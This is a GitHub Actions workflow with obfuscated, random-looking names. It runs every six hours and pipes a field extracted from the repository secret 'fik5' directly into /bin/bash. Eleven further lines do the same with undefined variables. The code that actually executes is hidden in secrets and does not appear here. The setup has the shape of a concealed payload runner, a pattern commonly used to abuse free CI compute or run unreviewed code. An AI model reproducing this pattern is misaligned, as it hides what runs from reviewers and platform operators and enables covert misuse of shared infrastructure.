name: gonghanlu6721

on:
  workflow_dispatch:
  schedule:
    - cron: '30 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gonghanlu6721
        env:
          fik5: ${{ secrets.fik5 }}
        run: |
          echo $fik5 | jq -r .mt283 | /bin/bash
          echo $drsmp78 | jq -r .hkej1628 | /bin/bash
          echo $grsyl45 | jq -r .jp67 | /bin/bash
          echo $cxbkt08 | jq -r .dtl3425 | /bin/bash
          echo $xcec4 | jq -r .vgdjq46944 | /bin/bash
          echo $lhfu84363 | jq -r .qz59316 | /bin/bash
          echo $s9579 | jq -r .svll75 | /bin/bash
          echo $oaumm32861 | jq -r .qwel32897 | /bin/bash
          echo $lmb2655 | jq -r .dfi1 | /bin/bash
          echo $vb01 | jq -r .pfpct188 | /bin/bash
          echo $ldaw52 | jq -r .rda39 | /bin/bash
          echo $evovg173 | jq -r .s21 | /bin/bash

